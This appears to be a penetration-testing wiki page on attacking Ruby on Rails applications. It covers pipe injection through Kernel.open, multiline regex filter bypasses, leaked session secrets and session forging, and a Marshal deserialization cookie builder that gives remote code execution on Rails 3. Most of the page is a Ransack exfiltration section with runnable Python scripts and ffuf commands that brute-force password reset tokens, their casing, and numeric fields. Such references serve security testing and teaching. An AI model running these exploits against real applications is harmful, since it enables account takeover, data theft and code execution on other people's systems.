Ruby on Rails
A common web framework for the Ruby Programming Language
Command Execution
In Ruby, if you can execute arbitrary code, wrapping a string in ` backticks is enough to execute system commands:
`touch a` # Runs the command and discards its output (enough for e.g. a reverse shell)
puts `id` # Prints the command's output
Security Pitfalls
In Ruby, Kernel is a module mixed into every object, so its methods can be called without the Kernel. prefix: Kernel.open() and open() are equivalent. File.open() is a different method, however, even though it sounds like it should do the same thing.
One important difference is that open() allows subprocesses to be created by prefixing the argument with the | pipe symbol (Ruby 3.3 deprecated this behavior, but it still works there and in earlier versions):
open("|id") do |file|
  puts file.read
end
# uid=1001(user) gid=1001(user) groups=1001(user)

File.open("|id") do |file|
  puts file.read
end
# No such file or directory @ rb_sysopen - |id (Errno::ENOENT)
If you control the start of such a path, you can inject a | pipe symbol to execute commands. Controlling the start of a path often also gives you Directory Traversal by starting it with /, but this attack does not require the / slash character and may get through a filter that tries to prevent it.
Regular Expressions
In Ruby, you can match a string against a regex in two simple ways:
a = "some text containing abbbbc to match"
if a =~ /ab+c/
  puts "match"
end
if a.match(/ab+c/)
  puts "match"
end
These two ways behave identically to each other, but not the same as in many other programming languages. The difference is that Ruby Regular Expressions are multi-line by default: ^ and $ match at the start and end of every line, so use \A and \z to anchor to the whole string.
a = "foo\nbar"
if a =~ /^foo$/ # Tries to match only "foo"
  puts "match" # Still matches, so "bar" gets injected
end
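For contrast, here is a minimal Python sketch of the same check. It only illustrates the single-line default that many other languages share and is not part of the Ruby behavior itself. Passing `re.MULTILINE` reproduces what Ruby does by default.

```python
import re

value = "foo\nbar"  # attacker-controlled input with an injected second line

# Python default: ^ and $ only match at the start and end of the string
# (or just before a final newline), so this check fails
print(re.search(r"^foo$", value))  # None

# With re.MULTILINE, ^ and $ match on every line, mirroring Ruby's default
print(re.search(r"^foo$", value, re.MULTILINE) is not None)  # True

# \A and \Z anchor to the whole string regardless of flags
print(re.search(r"\Afoo\Z", value, re.MULTILINE))  # None
```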
URL Parameters
Similarly to PHP, Ruby on Rails allows you to put arrays in query parameters:
?user[]=first&user[]=second
This will result in a params variable like this:
{"user" => ["first","second"]}
You can even use named array keys to create objects inside:
?user[name]=hacker&user[password]=hunter2
{"user" => {"name" => "hacker", "password" => "hunter2"}}
Finally, you can create nil values by not providing a value, which might break some things:
?user[name]
{"user" => {"name" => nil}}
See 1.1.2 - Multiparameter attributes and 1.1.3 - POST/PUT text/xml for more input tricks like these.
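When scripting such requests, the bracketed names are just ordinary parameter keys. A minimal Python sketch, using only the standard library's `urllib.parse`, could build the three query strings above. The `nil` case is assembled by hand because `urlencode` always emits an `=` sign. The variable names are illustrative only.

```python
from urllib.parse import quote, urlencode

# Array: repeat the same "user[]" key once per element
array_qs = urlencode([("user[]", "first"), ("user[]", "second")])

# Hash: one key per named field
hash_qs = urlencode({"user[name]": "hacker", "user[password]": "hunter2"})

# nil: a key without "=", percent-encoded by hand
nil_qs = quote("user[name]", safe="")

print(array_qs)  # user%5B%5D=first&user%5B%5D=second
print(hash_qs)   # user%5Bname%5D=hacker&user%5Bpassword%5D=hunter2
print(nil_qs)    # user%5Bname%5D
```

The percent-encoded brackets are decoded by the server before the nested structure is parsed, so they are equivalent to the literal `[` and `]` shown above.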
Sessions
You can do a lot if you can find the Secret Key used for verifying sessions. Some common locations are:
config/environment.rb
config/initializers/secret_token.rb
config/secrets.yml
/proc/self/environ (if it's just given via an environment variable)
Forging sessions
First of all, you can of course sign your own data to create arbitrary objects that might bypass authentication or anything else. See this code as an example to serialize your own data.
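As a rough Python sketch of the signing step, assume the legacy `payload--digest` cookie layout (Base64 payload, hex HMAC-SHA1) that the Ruby snippet in the next section also produces. Newer Rails versions derive keys and encrypt cookies, so this would not apply there unchanged. `sign_cookie`, `verify_cookie`, and the secret are hypothetical names, and producing the serialized bytes is left to Ruby's Marshal.

```python
import base64
import hashlib
import hmac
from urllib.parse import quote, unquote


def sign_cookie(serialized: bytes, secret: bytes) -> str:
    """Return '<url-encoded base64 payload>--<hex HMAC-SHA1>'."""
    data = base64.b64encode(serialized).decode()
    digest = hmac.new(secret, data.encode(), hashlib.sha1).hexdigest()
    return f"{quote(data, safe='')}--{digest}"


def verify_cookie(cookie: str, secret: bytes) -> bool:
    """Recompute the digest, e.g. to confirm that a guessed secret is correct."""
    data, _, digest = cookie.rpartition("--")
    expected = hmac.new(secret, unquote(data).encode(), hashlib.sha1).hexdigest()
    return hmac.compare_digest(expected, digest)


# Hypothetical values: a leaked secret and an already-serialized session
secret = b"hypothetical-leaked-secret"
payload = b"\x04\x08{\x00"  # placeholder: Ruby's Marshal encoding of an empty Hash
cookie = sign_cookie(payload, secret)
print(cookie)
print(verify_cookie(cookie, secret))  # True
```

`verify_cookie` is also handy in the other direction: running it over a captured cookie with candidate secrets shows which secret the application actually uses.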
Insecure Deserialization
Ruby on Rails session cookies have traditionally used Marshal serialization to turn objects into strings, and then back into objects on deserialization.
For Rails 3, you can use a piece of code like this (built on Metasploit's Rex::Text helpers) to create a Marshal payload that executes any Ruby code:
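def build_cookie
  code = "eval('whatever ruby code')"
  # Hand-built Marshal stream: a DeprecatedInstanceVariableProxy wrapping an
  # ERB object, so that using the proxy calls ERB#result and evaluates @src
  marshal_payload = Rex::Text.encode_base64(
    "\x04\x08" +
    "o" +
    ":\x40ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy" +
    "\x07" +
    ":\x0E@instance" +
    "o" + ":\x08ERB" + "\x06" +
    ":\x09@src" +
    Marshal.dump(code)[2..-1] +
    ":\x0C@method" + ":\x0Bresult"
  ).chomp
  # SECRET_TOKEN is the leaked application secret
  # (OpenSSL::Digest::Digest no longer exists in current Ruby versions)
  digest = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new("SHA1"),
                                   SECRET_TOKEN, marshal_payload)
  marshal_payload = Rex::Text.uri_encode(marshal_payload)
  "#{marshal_payload}--#{digest}"
end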
For more recent versions, the following post describes a different deserialization chain:
More References
Ransack Data Exfiltration
The popular Ransack Ruby library allows developers to build database queries from request parameters in the form of objects. In versions before 4.0.0 (released Feb 9, 2023), every attribute and association is searchable by default, so there is a big risk that the query parameters performing these filters reach more than intended. The client often provides a query in which they specify what attributes to filter on, with predicates like cont (contains) or start (starts with). An attacker can point these at sensitive data like password reset tokens and exfiltrate it character by character.
Take this vulnerable code example:
# User class with sensitive data, has posts
class User < ActiveRecord::Base
  validates :email, :username, presence: true
  attr_accessor :password_hash, :reset_password_token
  has_many :posts
end

# Post class to be queried, belongs to a user
class Post < ActiveRecord::Base
  validates :title, :content, presence: true
  belongs_to :user
end

# Vulnerable page with user input
def search
  @q = Post.ransack(params[:q])
  @posts = @q.result(distinct: true)
end
Here the search page uses params[:q] from the client to query the Post class, which is intended to be searched by title or content.
Then, a URL like /search?q[title_cont]=hacking will respond with all posts whose title contains "hacking". First comes the path to the attribute (title), and then the predicate (cont), separated by an _ underscore.
The vulnerability arises when we provide a sensitive attribute instead, which is easy because the path to the attribute can go deeper through associations, with the names again separated by underscores. If we want to find the reset_password_token, for example, this is inside of the user: /search?q[user_reset_password_token_cont]=hacking. This query will return something if there is a user with "hacking" in their password reset token. It can be abused for a character-by-character brute-force attack, where we provide all possible starting characters and find which one gives results back, indicating it was found:
GET /search?q[user_reset_password_token_start]=0 -> Empty results page
GET /search?q[user_reset_password_token_start]=1 -> Empty results page
GET /search?q[user_reset_password_token_start]=2 -> Results in page
Afterward, we know a token starts with 2, and we can simply try all possible characters after it:
GET /search?q[user_reset_password_token_start]=20 -> Empty results page
GET /search?q[user_reset_password_token_start]=21 -> Empty results page
...
GET /search?q[user_reset_password_token_start]=2c -> Empty results page
GET /search?q[user_reset_password_token_start]=2d -> Results in page
By repeating this, we eventually find, for example, q[user_reset_password_token_start]=2dd0571e439813f7, after which no further character gives results. The entire token has then been leaked in relatively few requests (at most 16 per character for a hexadecimal token).
Leaking such a hexadecimal token can look something like this:
import requests
from tqdm import tqdm  # Progress bar

HOST = "http://localhost:4567"  # TARGET
ALPHABET = b"0123456789abcdef"

token = b""
for length in tqdm(range(16), desc="Length", leave=False):
    for c in tqdm(ALPHABET, desc=f"{length}", leave=False):
        prefix = token + bytes([c])
        params = {  # Check with start (case insensitive)
            "q[user_reset_password_token_start]": prefix.decode(),
        }
        r = requests.get(HOST + "/search", params=params)
        if len(r.text) > 5000:  # Threshold for results
            token += bytes([c])
            tqdm.write(repr(token))
            break
    else:  # If nothing new found, we are done
        break

token = token.decode()
print("Found case-insensitive:", token)
In this case, we found the sensitive user and reset_password_token attributes by reading the code, but in a more black-box scenario where you only notice the ?q[attr_predicate]= pattern, some guessing is required. Tools like ffuf can fuzz for these attributes by placing a keyword (FUZZ by default, or custom ones like OBJ and PROP below) in the correct part of a URL:
$ ffuf -u 'http://localhost:4567/search?q[OBJ_PROP_eq]=random6bQ1kL' -w objs.txt:OBJ -w props.txt:PROP -fs 7301
...
[Status: 200, Size: 521, Words: 56, Lines: 15, Duration: 3ms]
* OBJ: user
* PROP: reset_password_token
[Status: 200, Size: 521, Words: 56, Lines: 15, Duration: 5ms]
* OBJ: user
* PROP: name
[Status: 200, Size: 521, Words: 56, Lines: 15, Duration: 3ms]
* OBJ: user
* PROP: id
In the example above, we try to find an object and property for which the _eq predicate with a random value matches nothing. A valid attribute then gives a smaller response without results, while an invalid attribute is ignored and returns all results at a static size (filtered out here with -fs 7301).
This behavior varies, as in some cases a wrong guess will instead give no results, requiring you to change the fuzzing. A strategy for this would be to create a (mostly) always-true query like ?q[OBJ_PROP_cont]=_, asking for the property to contain at least one character (_ is the single-character wildcard).
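The same size-based filtering can be scripted. Below is a minimal Python sketch of the idea behind the ffuf command above, assuming an invalid attribute always returns the same baseline size. `find_attributes` and `fake_fetch_size` are hypothetical helpers, and the fake stands in for a real HTTP request so the logic can be tried offline.

```python
from itertools import product


def find_attributes(objs, props, fetch_size, baseline_size):
    """Return (obj, prop) pairs whose response size differs from the baseline."""
    hits = []
    for obj, prop in product(objs, props):
        # Random-looking value: a valid attribute should match nothing
        params = {f"q[{obj}_{prop}_eq]": "random6bQ1kL"}
        if fetch_size(params) != baseline_size:
            hits.append((obj, prop))
    return hits


def fake_fetch_size(params):
    # Stand-in for len(requests.get(HOST + "/search", params=params).text)
    valid = {"q[user_reset_password_token_eq]", "q[user_name_eq]"}
    return 521 if set(params) & valid else 7301


found = find_attributes(
    ["user", "post"], ["name", "reset_password_token"], fake_fetch_size, 7301
)
print(found)  # [('user', 'name'), ('user', 'reset_password_token')]
```

For the inverted case, where wrong guesses give no results, the same loop should work with the `cont` predicate and `_` as the value, treating responses that do contain results as hits.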
Case Insensitive Predicates
An important note, however, is that the start predicate is case-insensitive, meaning that with this technique alone we won't know the casing of a token. For a hexadecimal token this is no problem, but for a Base64 token it is important to get this correct.
There is no easy way to make start case-sensitive, but there are alternative predicates that can be case-sensitive, like eq (SQL =) or cont (SQL LIKE). Not all databases perform LIKE case-sensitively: popular ones that do include PostgreSQL and Oracle DB, while MySQL/MariaDB, SQLite, and Microsoft SQL Server do not. It is easy to test which is the case by searching for a known string with the wrong casing using the eq or cont predicates.
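A minimal Python sketch of that test, assuming you know a value that certainly exists (for example the title of a public post). `is_case_sensitive` and `fake_has_results` are hypothetical helpers. The fake backend pretends that `cont` ignores case and `eq` does not, and would be replaced by a real request.

```python
def is_case_sensitive(has_results, predicate, known_value, attr="title"):
    """Return True if the same search with swapped casing no longer matches."""
    key = f"q[{attr}_{predicate}]"
    if not has_results({key: known_value}):
        raise ValueError("control query found nothing, pick another known value")
    return not has_results({key: known_value.swapcase()})


def fake_has_results(params):
    # Stand-in for e.g. '<li>' in requests.get(HOST + "/search", params=params).text
    key, value = next(iter(params.items()))
    stored = "Hello World"
    if key.endswith("_cont]"):
        return value.lower() in stored.lower()  # case-insensitive LIKE
    return value == stored  # case-sensitive equality


print(is_case_sensitive(fake_has_results, "eq", "Hello World"))  # True
print(is_case_sensitive(fake_has_results, "cont", "Hello"))      # False
```

The known value needs at least one letter, otherwise swapping the case changes nothing and the result is meaningless.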
Commonly, eq will work case-sensitively, making it possible to guess all different combinations of casing for a token. If you found a token like a2b, you can try a2b, A2b, a2B, and A2B to find the correct one. Then, use this correct token to reset the password, or whatever else the sensitive data lets you do. Here is an implementation:
# Try all casings of the leaked token
def all_casings(input_string):
    if not input_string:
        yield ""
    else:
        first = input_string[:1]
        if first.lower() == first.upper():
            for sub_casing in all_casings(input_string[1:]):
                yield first + sub_casing
        else:
            for sub_casing in all_casings(input_string[1:]):
                yield first.lower() + sub_casing
                yield first.upper() + sub_casing

for cased_token in tqdm(list(all_casings(token)), desc="Casing", leave=False):
    params = {  # Check with equals (case sensitive)
        "q[user_reset_password_token_eq]": cased_token,
    }
    r = requests.get(HOST + "/search", params=params)
    if '<li>' in r.text:  # Results were returned
        break

print("Found case-sensitive: ", cased_token)
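The number of casings doubles with every letter in the token, so it is worth estimating the request count before starting. A small sketch, with `count_casings` as a hypothetical helper that counts characters the same way `all_casings` distinguishes them:

```python
def count_casings(token: str) -> int:
    """Number of strings a full casing enumeration of `token` would yield."""
    cased = sum(1 for ch in token if ch.lower() != ch.upper())
    return 2 ** cased


print(count_casings("a2b"))               # 4
print(count_casings("2dd0571e439813f7"))  # 16
print(count_casings("a" * 22))            # 4194304
```

Around twenty letters already means millions of `eq` requests, so for long tokens a case-sensitive prefix predicate, if the database offers one, is likely the more practical route.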
Binary Search
If the targeted data is numeric, it is possible to use the lt (less than) or lteq (less than or equal) predicates to compare against a whole range of values at once. This enables a Binary Search, which can drastically speed up your attack. Here is a simple implementation that leaks the number attribute from user:
def test(guess):
    """if target is lower than guess (not equal)"""
    params = {
        "q[user_number_lt]": guess,
    }
    r = requests.get(HOST + "/search", params=params)
    return len(r.text) > 5000

def binary_search(lo=0, hi=10000):
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if test(mid):
            hi = mid - 1
        else:
            lo = mid
    return lo
A more advanced example is achieving Binary Search for string attributes. We need a way to test a range (half of the possible values) at once. It turns out that the start_any predicate (similar to cont_any) can do this for us! It takes an array and applies the regular start predicate to every string in that array, succeeding if any of them matches.
We can make use of this by specifying half of the possible continuations as an array in the query parameters, which will return results if the next character is in any of them, achieving Binary Search once again.
One important thing to note is that Rails (like many other frameworks) accepts arrays as query parameters by duplicating the names and appending [], like ?array[]=1&array[]=2 to create array=["1","2"]. We use this to send the required strings, each consisting of the prefix known so far plus one of the candidate characters. If we know prefix="se", the guesses will be ["sea", "seb", "sec", ...].
Here is an example implementation:
import requests

HOST = "http://localhost:4567"
ALPHABET = list("0123456789abcdefghijklmnopqrstuvwxyz")

def test(prefix, guess):
    # Create array of possible continuations
    l = [prefix + c for c in ALPHABET[:guess]]
    # Pass array as query parameters
    params = [("q[user_reset_password_token_start_any][]", s) for s in l]
    r = requests.get(HOST + "/search", params=params)
    return '<li>' in r.text

def binary_search(prefix, lo=0, hi=len(ALPHABET)):
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if test(prefix, mid):
            hi = mid - 1
        else:
            lo = mid
    return ALPHABET[lo] if lo < len(ALPHABET) else None

if __name__ == "__main__":
    prefix = ""
    while result := binary_search(prefix):
        prefix += result
        print(prefix)
For all but the smallest alphabets, binary search needs fewer requests than linear search, and the difference grows with the size of ALPHABET. If this size is N, the average number of attempts per character will be roughly:
Linear Search: N/2 (N=50 -> 25 attempts)
Binary Search: log2(N) (N=50 -> 6 attempts)
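These estimates can be reproduced with a few lines of Python. This is a back-of-the-envelope sketch: `linear_attempts` and `binary_attempts` are hypothetical helper names, and the binary figure is rounded up because a request cannot be split.

```python
import math


def linear_attempts(n: int) -> float:
    """Average guesses per character when trying candidates one by one."""
    return n / 2


def binary_attempts(n: int) -> int:
    """Guesses per character when the candidate set is halved every request."""
    return math.ceil(math.log2(n))


for n in (16, 36, 50, 64):
    print(n, linear_attempts(n), binary_attempts(n))
# 16 8.0 4
# 36 18.0 6
# 50 25.0 6
# 64 32.0 6
```

Doubling the alphabet doubles the cost of linear search but adds only one request per character to binary search.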